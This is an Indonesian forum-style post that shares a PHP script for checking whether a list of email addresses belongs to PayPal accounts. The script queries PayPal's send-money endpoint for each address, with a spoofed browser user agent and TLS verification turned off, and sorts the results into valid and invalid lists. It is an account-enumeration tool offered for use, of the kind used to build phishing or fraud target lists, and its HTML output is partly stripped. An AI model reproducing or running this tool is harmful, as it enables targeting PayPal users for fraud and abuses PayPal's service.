Paypal Valid checker srcipt



langsung aja mau share script buat check email apakan email tersebut akun paypa apa bukan

langsung aja ni source codenya



@set_time_limit(0);

function curl($url='',$var='',$Follow=False){
    global $set;
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,20);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31');
    curl_setopt($curl, CURLOPT_COOKIE,'PP1.txt');
    curl_setopt($curl, CURLOPT_COOKIEFILE,'PP1.txt');
    curl_setopt($curl, CURLOPT_COOKIEJAR,'PP1.txt');
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
    if ($Follow !== False) {
    curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
    }
    $result = curl_exec($curl);
    curl_close($curl);
    return $result;
}
echo "



Valid Email Checker
";

$emails = $_POST['emails'];
print '



www.cybersquads.com
Paypal Checker



   


   


';

if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "

Checking  ".count($emails)." emails ....

";
foreach ( $emails as $email ) {
    $email = trim($email);
     print " $count .. Checking ".$email." ..... ";
    $count++;
    if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$_CheckAction = curl('https://www.paypal.com/cgi-bin/webscr?cmd=_send-money&myAllTextSubmitID=&cmd=_send-money&type=external&payment_source=p2p_mktgpage&payment_type=Gift&sender_email='.$email.'&email=gz%40s.com¤cy=USD&amount=10&amount_ccode=USD&submit.x=Continue',CURLOPT_FAILONERROR,TRUE);
            if(!strpos($_CheckAction, "region")) {
                print "Yes
";

                $yes++;
                $vaild_yes .=$email."\n";
            }
        else {
            print "NO
";

            $not++;
            $vaild_no .=$email."\n";
        }
    }
    else {
        print "Invaild email
";

        $inv++;
        $invaild .=$email."\n";
}
}

print '


   



        
        
        
        


   

   
   
   
          
        
        
   

PayPal emails ('.$yes.')

Not PayPal emails ('.$not.')

Invalid emails ('.$inv.')

';

}

?>

 

     


buka dengan txt dan simpan dengan extensi .php


thanks